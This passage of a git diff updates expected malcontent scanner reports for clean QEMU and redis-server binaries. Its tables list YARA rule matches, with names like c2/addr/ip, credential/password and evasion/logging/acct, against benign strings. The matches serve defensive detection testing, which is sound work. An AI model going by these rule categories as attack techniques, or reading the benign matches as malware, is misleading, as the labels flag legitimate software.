[socket](https://github.com/search?q=socket&type=code) | +| MEDIUM | [net/socket/reuseport](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/reuseport.yara#reuseport) | reuse TCP/IP ports for listening and connecting | [SO_REUSEADDR](https://github.com/search?q=SO_REUSEADDR&type=code) | +| MEDIUM | [net/tcp/sftp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/sftp.yara#sftp) | Supports sftp (FTP over SSH) | [sftp](https://github.com/search?q=sftp&type=code)
[ssh](https://github.com/search?q=ssh&type=code) | +| MEDIUM | [net/tcp/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/ssh.yara#ssh) | Uses SSH (secure shell) service | [SSH](https://github.com/search?q=SSH&type=code) | +| MEDIUM | [net/tun_tap](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tun_tap.yara#tun_tap) | accesses the TUN/TAP device driver | [/dev/net/tun](https://github.com/search?q=%2Fdev%2Fnet%2Ftun&type=code) | +| MEDIUM | [persist/daemon](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/daemon/daemon.yara#daemon) | Run as a background daemon | [-daemon](https://github.com/search?q=-daemon&type=code)
[daemonize](https://github.com/search?q=daemonize&type=code)
[is_daemon](https://github.com/search?q=is_daemon&type=code)
[os_daemon](https://github.com/search?q=os_daemon&type=code)
[os_set_daemon](https://github.com/search?q=os_set_daemon&type=code)
[qemu_daemon](https://github.com/search?q=qemu_daemon&type=code) | +| MEDIUM | [persist/pid_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file) | pid file, likely DIY daemon | [pid_file](https://github.com/search?q=pid_file&type=code) | +| MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [d is not known!!](https://github.com/search?q=d+is+not+known%21%21&type=code) | +| MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [intercept_dev](https://github.com/search?q=intercept_dev&type=code)
[intercept_gpio_out](https://github.com/search?q=intercept_gpio_out&type=code)
[intercept_in](https://github.com/search?q=intercept_in&type=code)
[intercept_out](https://github.com/search?q=intercept_out&type=code)
[intercepts](https://github.com/search?q=intercepts&type=code) | +| MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | +| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [Cannot derive password](https://github.com/search?q=Cannot+derive+password&type=code)
[Could not set password expire time](https://github.com/search?q=Could+not+set+password+expire+time&type=code)
[Invalid password](https://github.com/search?q=Invalid+password&type=code)
[SetPasswordAction_lookup](https://github.com/search?q=SetPasswordAction_lookup&type=code)
[change-vnc-password](https://github.com/search?q=change-vnc-password&type=code)
[enter_expire_password](https://github.com/search?q=enter_expire_password&type=code)
[exit_change_vnc_password](https://github.com/search?q=exit_change_vnc_password&type=code)
[hmp_expire_password](https://github.com/search?q=hmp_expire_password&type=code)
[hmp_set_password](https://github.com/search?q=hmp_set_password&type=code)
[marshal_expire_password](https://github.com/search?q=marshal_expire_password&type=code)
[monitor_read_password](https://github.com/search?q=monitor_read_password&type=code)
[not support password prompting](https://github.com/search?q=not+support+password+prompting&type=code)
[obj_change_vnc_password_arg_members](https://github.com/search?q=obj_change_vnc_password_arg_members&type=code)
[password is expired](https://github.com/search?q=password+is+expired&type=code)
[password is not set](https://github.com/search?q=password+is+not+set&type=code)
[please enable password auth using](https://github.com/search?q=please+enable+password+auth+using&type=code)
[prop_get_passwordid](https://github.com/search?q=prop_get_passwordid&type=code)
[prop_set_passwordid](https://github.com/search?q=prop_set_passwordid&type=code)
[protocol password](https://github.com/search?q=protocol+password&type=code)
[proxy-password-secret](https://github.com/search?q=proxy-password-secret&type=code)
[qapi_free_ExpirePasswordOptionsVnc](https://github.com/search?q=qapi_free_ExpirePasswordOptionsVnc&type=code)
[qapi_free_SetPasswordOptionsVnc](https://github.com/search?q=qapi_free_SetPasswordOptionsVnc&type=code)
[qmp_change_vnc_password](https://github.com/search?q=qmp_change_vnc_password&type=code)
[qmp_enter_set_password](https://github.com/search?q=qmp_enter_set_password&type=code)
[qmp_exit_expire_password](https://github.com/search?q=qmp_exit_expire_password&type=code)
[qmp_exit_set_password](https://github.com/search?q=qmp_exit_set_password&type=code)
[qmp_expire_password](https://github.com/search?q=qmp_expire_password&type=code)
[qmp_marshal_set_password](https://github.com/search?q=qmp_marshal_set_password&type=code)
[qmp_set_password](https://github.com/search?q=qmp_set_password&type=code)
[that match this password](https://github.com/search?q=that+match+this+password&type=code)
[type_ExpirePasswordOptionsVnc](https://github.com/search?q=type_ExpirePasswordOptionsVnc&type=code)
[type_ExpirePasswordOptions_members](https://github.com/search?q=type_ExpirePasswordOptions_members&type=code)
[visit_type_SetPasswordAction](https://github.com/search?q=visit_type_SetPasswordAction&type=code)
[visit_type_SetPasswordOptionsVnc](https://github.com/search?q=visit_type_SetPasswordOptionsVnc&type=code)
[visit_type_SetPasswordOptions_members](https://github.com/search?q=visit_type_SetPasswordOptions_members&type=code)
[vnc password expire-time](https://github.com/search?q=vnc+password+expire-time&type=code)
[vnc_display_password](https://github.com/search?q=vnc_display_password&type=code) | +| LOW | [credential/ssl/private_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssl/private_key.yara#private_key_val) | References private keys | [private_key](https://github.com/search?q=private_key&type=code) | +| LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [AES](https://github.com/search?q=AES&type=code) | +| LOW | [crypto/tls](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/tls.yara#tls) | tls | [crypto/tls](https://github.com/search?q=crypto%2Ftls&type=code) | +| LOW | [data/compression/bzip2](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/bzip2.yara#bzip2) | Works with bzip2 files | [bzip2](https://github.com/search?q=bzip2&type=code) | +| LOW | [data/compression/gzip](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/gzip.yara#gzip) | [works with gzip files](https://www.gnu.org/software/gzip/) | [gzip](https://github.com/search?q=gzip&type=code) | +| LOW | [data/compression/zstd](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/zstd.yara#zstd) | Zstandard: fast real-time compression algorithm | [ZSTD_decompressStream](https://github.com/search?q=ZSTD_decompressStream&type=code)
[zstd](https://github.com/search?q=zstd&type=code) | +| LOW | [data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64) | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | +| LOW | [data/hash/md5](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/md5.yara#MD5) | Uses the MD5 signature format | [md5:](https://github.com/search?q=md5%3A&type=code) | +| LOW | [data/hash/sha256](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha256.yara#SHA256) | Uses the SHA256 signature format | [SHA256_](https://github.com/search?q=SHA256_&type=code) | +| LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | +| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | +| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [evasion/logging/acct](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/acct.yara#acct) | switch process accounting on or off | [acct](https://github.com/search?q=acct&type=code) | +| LOW | [exec/plugin](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin) | references a 'plugin' | [Could not load plugin](https://github.com/search?q=Could+not+load+plugin&type=code)
[Plugin options](https://github.com/search?q=Plugin+options&type=code)
[cap_disas_plugin](https://github.com/search?q=cap_disas_plugin&type=code)
[gen_plugin_u64_ptr](https://github.com/search?q=gen_plugin_u64_ptr&type=code)
[load a plugin](https://github.com/search?q=load+a+plugin&type=code)
[op_plugin](https://github.com/search?q=op_plugin&type=code)
[output from TCG plugins](https://github.com/search?q=output+from+TCG+plugins&type=code)
[plugin file](https://github.com/search?q=plugin+file&type=code)
[plugin_add_dyn_cb_arr](https://github.com/search?q=plugin_add_dyn_cb_arr&type=code)
[plugin_atexit_cb](https://github.com/search?q=plugin_atexit_cb&type=code)
[plugin_bool_parse](https://github.com/search?q=plugin_bool_parse&type=code)
[plugin_cb__udata](https://github.com/search?q=plugin_cb__udata&type=code)
[plugin_cond_to_tcgcond](https://github.com/search?q=plugin_cond_to_tcgcond&type=code)
[plugin_disas](https://github.com/search?q=plugin_disas&type=code)
[plugin_dyn_cb_arr_cmp](https://github.com/search?q=plugin_dyn_cb_arr_cmp&type=code)
[plugin_end_code](https://github.com/search?q=plugin_end_code&type=code)
[plugin_entry_code](https://github.com/search?q=plugin_entry_code&type=code)
[plugin_flush_cb](https://github.com/search?q=plugin_flush_cb&type=code)
[plugin_flush_destroy](https://github.com/search?q=plugin_flush_destroy&type=code)
[plugin_from_name](https://github.com/search?q=plugin_from_name&type=code)
[plugin_gen_disable_mem](https://github.com/search?q=plugin_gen_disable_mem&type=code)
[plugin_gen_inject](https://github.com/search?q=plugin_gen_inject&type=code)
[plugin_gen_insn_end](https://github.com/search?q=plugin_gen_insn_end&type=code)
[plugin_gen_insn_start](https://github.com/search?q=plugin_gen_insn_start&type=code)
[plugin_gen_mem](https://github.com/search?q=plugin_gen_mem&type=code)
[plugin_gen_tb_end](https://github.com/search?q=plugin_gen_tb_end&type=code)
[plugin_gen_tb_start](https://github.com/search?q=plugin_gen_tb_start&type=code)
[plugin_get_dyn_cb](https://github.com/search?q=plugin_get_dyn_cb&type=code)
[plugin_get_hwaddr](https://github.com/search?q=plugin_get_hwaddr&type=code)
[plugin_get_registers](https://github.com/search?q=plugin_get_registers&type=code)
[plugin_hwaddr_is_io](https://github.com/search?q=plugin_hwaddr_is_io&type=code)
[plugin_init](https://github.com/search?q=plugin_init&type=code)
[plugin_insn_data](https://github.com/search?q=plugin_insn_data&type=code)
[plugin_insn_disas](https://github.com/search?q=plugin_insn_disas&type=code)
[plugin_insn_haddr](https://github.com/search?q=plugin_insn_haddr&type=code)
[plugin_insn_size](https://github.com/search?q=plugin_insn_size&type=code)
[plugin_insn_symbol](https://github.com/search?q=plugin_insn_symbol&type=code)
[plugin_insn_vaddr](https://github.com/search?q=plugin_insn_vaddr&type=code)
[plugin_list](https://github.com/search?q=plugin_list&type=code)
[plugin_load_list](https://github.com/search?q=plugin_load_list&type=code)
[plugin_mem_is_store](https://github.com/search?q=plugin_mem_is_store&type=code)
[plugin_mem_size_shift](https://github.com/search?q=plugin_mem_size_shift&type=code)
[plugin_num_vcpus](https://github.com/search?q=plugin_num_vcpus&type=code)
[plugin_opt_parse](https://github.com/search?q=plugin_opt_parse&type=code)
[plugin_path_to_binary](https://github.com/search?q=plugin_path_to_binary&type=code)
[plugin_print_address](https://github.com/search?q=plugin_print_address&type=code)
[plugin_read_register](https://github.com/search?q=plugin_read_register&type=code)
[plugin_register_atexit](https://github.com/search?q=plugin_register_atexit&type=code)
[plugin_register_cb](https://github.com/search?q=plugin_register_cb&type=code)
[plugin_register_dyn_cb](https://github.com/search?q=plugin_register_dyn_cb&type=code)
[plugin_register_inline](https://github.com/search?q=plugin_register_inline&type=code)
[plugin_reset_destroy](https://github.com/search?q=plugin_reset_destroy&type=code)
[plugin_reset_uninstall](https://github.com/search?q=plugin_reset_uninstall&type=code)
[plugin_scoreboard_find](https://github.com/search?q=plugin_scoreboard_find&type=code)
[plugin_scoreboard_free](https://github.com/search?q=plugin_scoreboard_free&type=code)
[plugin_scoreboard_new](https://github.com/search?q=plugin_scoreboard_new&type=code)
[plugin_start_code](https://github.com/search?q=plugin_start_code&type=code)
[plugin_tb_get_insn](https://github.com/search?q=plugin_tb_get_insn&type=code)
[plugin_tb_n_insns](https://github.com/search?q=plugin_tb_n_insns&type=code)
[plugin_tb_trans_cb](https://github.com/search?q=plugin_tb_trans_cb&type=code)
[plugin_tb_vaddr](https://github.com/search?q=plugin_tb_vaddr&type=code)
[plugin_uninstall](https://github.com/search?q=plugin_uninstall&type=code)
[plugin_update_ns](https://github.com/search?q=plugin_update_ns&type=code)
[plugin_user_exit](https://github.com/search?q=plugin_user_exit&type=code)
[plugin_user_postfork](https://github.com/search?q=plugin_user_postfork&type=code)
[plugin_vcpu_cb__simple](https://github.com/search?q=plugin_vcpu_cb__simple&type=code)
[plugin_vcpu_exit_hook](https://github.com/search?q=plugin_vcpu_exit_hook&type=code)
[plugin_vcpu_for_each](https://github.com/search?q=plugin_vcpu_for_each&type=code)
[plugin_vcpu_idle_cb](https://github.com/search?q=plugin_vcpu_idle_cb&type=code)
[plugin_vcpu_init_hook](https://github.com/search?q=plugin_vcpu_init_hook&type=code)
[plugin_vcpu_mem_cb](https://github.com/search?q=plugin_vcpu_mem_cb&type=code)
[plugin_vcpu_resume_cb](https://github.com/search?q=plugin_vcpu_resume_cb&type=code)
[plugin_vcpu_syscall](https://github.com/search?q=plugin_vcpu_syscall&type=code)
[qemu_plugin_add_dyn](https://github.com/search?q=qemu_plugin_add_dyn&type=code)
[qemu_plugin_install](https://github.com/search?q=qemu_plugin_install&type=code)
[qemu_plugin_opts](https://github.com/search?q=qemu_plugin_opts&type=code)
[qemu_plugin_outs](https://github.com/search?q=qemu_plugin_outs&type=code)
[qemu_plugin_path_to](https://github.com/search?q=qemu_plugin_path_to&type=code)
[qemu_plugin_request](https://github.com/search?q=qemu_plugin_request&type=code)
[qemu_plugin_reset](https://github.com/search?q=qemu_plugin_reset&type=code)
[qemu_plugin_u64_add](https://github.com/search?q=qemu_plugin_u64_add&type=code)
[qemu_plugin_u64_get](https://github.com/search?q=qemu_plugin_u64_get&type=code)
[qemu_plugin_u64_set](https://github.com/search?q=qemu_plugin_u64_set&type=code)
[qemu_plugin_u64_sum](https://github.com/search?q=qemu_plugin_u64_sum&type=code)
[qemu_plugin_version](https://github.com/search?q=qemu_plugin_version&type=code)
[tcg_gen_plugin_cb](https://github.com/search?q=tcg_gen_plugin_cb&type=code)
[tcg_gen_plugin_mem_cb](https://github.com/search?q=tcg_gen_plugin_mem_cb&type=code)
[tlb_plugin_lookup](https://github.com/search?q=tlb_plugin_lookup&type=code) | +| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | +| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | +| LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [rmdir](https://github.com/search?q=rmdir&type=code) | +| LOW | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#unlink) | [deletes files](https://man7.org/linux/man-pages/man2/unlink.2.html) | [unlinkat](https://github.com/search?q=unlinkat&type=code) | +| LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate64](https://github.com/search?q=ftruncate64&type=code) | +| LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlinkat](https://github.com/search?q=readlinkat&type=code) | +| LOW | [fs/mount](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/mount.yara#mount) | mounts file systems | [-o](https://github.com/search?q=-o&type=code)
[mount](https://github.com/search?q=mount&type=code) | +| LOW | [fs/node_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/node-create.yara#mknod) | [create device files](https://man7.org/linux/man-pages/man2/mknod.2.html) | [mknod](https://github.com/search?q=mknod&type=code) | +| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | [/etc/qemu-ifdown](https://github.com/search?q=%2Fetc%2Fqemu-ifdown&type=code)
[/etc/qemu-ifup](https://github.com/search?q=%2Fetc%2Fqemu-ifup&type=code)
[/etc/qemu/qemu.conf](https://github.com/search?q=%2Fetc%2Fqemu%2Fqemu.conf&type=code) | +| LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/tmp](https://github.com/search?q=%2Fvar%2Ftmp&type=code) | +| LOW | [fs/permission/chown](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-chown.yara#fchownat) | May change file ownership | [fchownat](https://github.com/search?q=fchownat&type=code) | +| LOW | [fs/symlink_resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/symlink-resolve.yara#realpath) | [resolves symbolic links](https://man7.org/linux/man-pages/man3/realpath.3.html) | [realpath](https://github.com/search?q=realpath&type=code) | +| LOW | [fs/watch](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/watch.yara#inotify) | monitors filesystem events | [inotify](https://github.com/search?q=inotify&type=code) | +| LOW | [net/dns/txt](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt) | Uses DNS TXT (text) records | [TXT](https://github.com/search?q=TXT&type=code)
[dns](https://github.com/search?q=dns&type=code) | +| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request) | makes HTTP requests | [HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code) | +| LOW | [net/ip/multicast_send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-multicast-send.yara#multicast) | [send data to multiple nodes simultaneously](https://en.wikipedia.org/wiki/IP_multicast) | [multicast](https://github.com/search?q=multicast&type=code) | +| LOW | [net/ip/send_unicast](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-send-unicast.yara#unicast) | send data to the internet | [unicast](https://github.com/search?q=unicast&type=code) | +| LOW | [net/resolve/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostname-resolve.yara#gethostbyname) | [resolve network host name to IP address](https://linux.die.net/man/3/gethostbyname) | [gethostbyname](https://github.com/search?q=gethostbyname&type=code) | +| LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | +| LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | +| LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | +| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recvmsg) | [receive a message from a socket](https://linux.die.net/man/2/recvmsg) | [recvmsg](https://github.com/search?q=recvmsg&type=code) | +| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [sendmsg](https://github.com/search?q=sendmsg&type=code)
[sendto](https://github.com/search?q=sendto&type=code) | +| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://qemu.org/contribute/report-a-bug](https://qemu.org/contribute/report-a-bug)
[https://wiki.qemu.org/Documentation/9psetup](https://wiki.qemu.org/Documentation/9psetup) | +| LOW | [os/fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_wait](https://github.com/search?q=epoll_wait&type=code) | +| LOW | [os/kernel/seccomp](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/seccomp.yara#seccomp) | [operate on Secure Computing state of the process](https://man7.org/linux/man-pages/man2/seccomp.2.html) | [seccomp](https://github.com/search?q=seccomp&type=code) | +| LOW | [process/chroot](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chroot.yara#chroot) | change the location of root for the process | [chroot](https://github.com/search?q=chroot&type=code) | +| LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) | +| LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | +| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | +| LOW | [process/unshare](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/unshare.yara#syscall_unshare) | disassociate parts of the process execution context | [unshare](https://github.com/search?q=unshare&type=code) | +| LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | diff --git a/tests/linux/clean/redis-server.aarch64.md b/tests/linux/clean/redis-server.aarch64.md index c5917e34a..300e3d50b 100644 --- a/tests/linux/clean/redis-server.aarch64.md +++ b/tests/linux/clean/redis-server.aarch64.md @@ -1,52 +1,51 @@ ## linux/clean/redis-server.aarch64 [🟡 MEDIUM] -| RISK | KEY | DESCRIPTION | EVIDENCE | -|--------|---------------------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[bus_port](https://github.com/search?q=bus_port&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[master_port](https://github.com/search?q=master_port&type=code)
[prev_ip](https://github.com/search?q=prev_ip&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[updatePort](https://github.com/search?q=updatePort&type=code) | -| MEDIUM | [discover/user/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) | -| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [execCommandAbort](https://github.com/search?q=execCommandAbort&type=code)
[replicaStartCommandStream](https://github.com/search?q=replicaStartCommandStream&type=code) | -| MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | -| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execve) | executes external programs | [execve](https://github.com/search?q=execve&type=code) | -| MEDIUM | [exec/shell/echo](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/echo.yara#elf_calls_shell_echo) | [program generates text with echo command](https://linux.die.net/man/1/echo) | [echo 'maxmemory 128mb'](https://github.com/search?q=echo+%27maxmemory+128mb%27&type=code)
[echo madvise > /sys/kernel/mm/transparent_hugepage/enabled' as root](https://github.com/search?q=echo+madvise+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27+as+root&type=code)
[echo never > /sys/kernel/mm/transparent_hugepage/enabled'](https://github.com/search?q=echo+never+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27&type=code)
[echo tsc > /sys/devices/system/clocksource/clocksource0/current_clock](https://github.com/search?q=echo+tsc+%3E+%2Fsys%2Fdevices%2Fsystem%2Fclocksource%2Fclocksource0%2Fcurrent_clock&type=code) | -| MEDIUM | [fs/file/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-create.yara#CreateFile) | create a new file | [CreateFileEvent](https://github.com/search?q=CreateFileEvent&type=code) | -| MEDIUM | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#DeleteFile) | delete a file | [DeleteFileEvent](https://github.com/search?q=DeleteFileEvent&type=code) | -| MEDIUM | [fs/file/times_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-times-set.yara#shell_toucher) | change file timestamps | [touch the specified keys](https://github.com/search?q=touch+the+specified+keys&type=code) | -| MEDIUM | [fs/path/relative](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/relative.yara#relative_path_val) | references and possibly executes relative path | [./redis-check-aof](https://github.com/search?q=.%2Fredis-check-aof&type=code)
[./redis-server](https://github.com/search?q=.%2Fredis-server&type=code) | -| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/dump.bin](https://github.com/search?q=%2Ftmp%2Fdump.bin&type=code)
[/tmp/dump.hex](https://github.com/search?q=%2Ftmp%2Fdump.hex&type=code) | -| MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) | -| MEDIUM | [fs/proc/arbitrary_pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%ld/smaps](https://github.com/search?q=%2Fproc%2F%25ld%2Fsmaps&type=code) | -| MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [RM_SendChildHeartbeat](https://github.com/search?q=RM_SendChildHeartbeat&type=code)
[RedisModule_SendChildHeartbeat](https://github.com/search?q=RedisModule_SendChildHeartbeat&type=code) | -| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | -| MEDIUM | [net/ip/addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/addr.yara#ip_addr) | mentions an 'IP address' | [IP address](https://github.com/search?q=IP+address&type=code) | -| MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | -| MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntop](https://github.com/search?q=inet_ntop&type=code) | -| MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | generic listen string | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| MEDIUM | [net/socket/reuseport](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/reuseport.yara#reuseport) | reuse TCP/IP ports for listening and connecting | [SO_REUSEADDR](https://github.com/search?q=SO_REUSEADDR&type=code) | -| MEDIUM | [persist/daemon](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/daemon/daemon.yara#daemon) | Run as a background daemon | [daemonize](https://github.com/search?q=daemonize&type=code) | -| MEDIUM | [persist/pid_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file) | pid file, likely DIY daemon | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code)
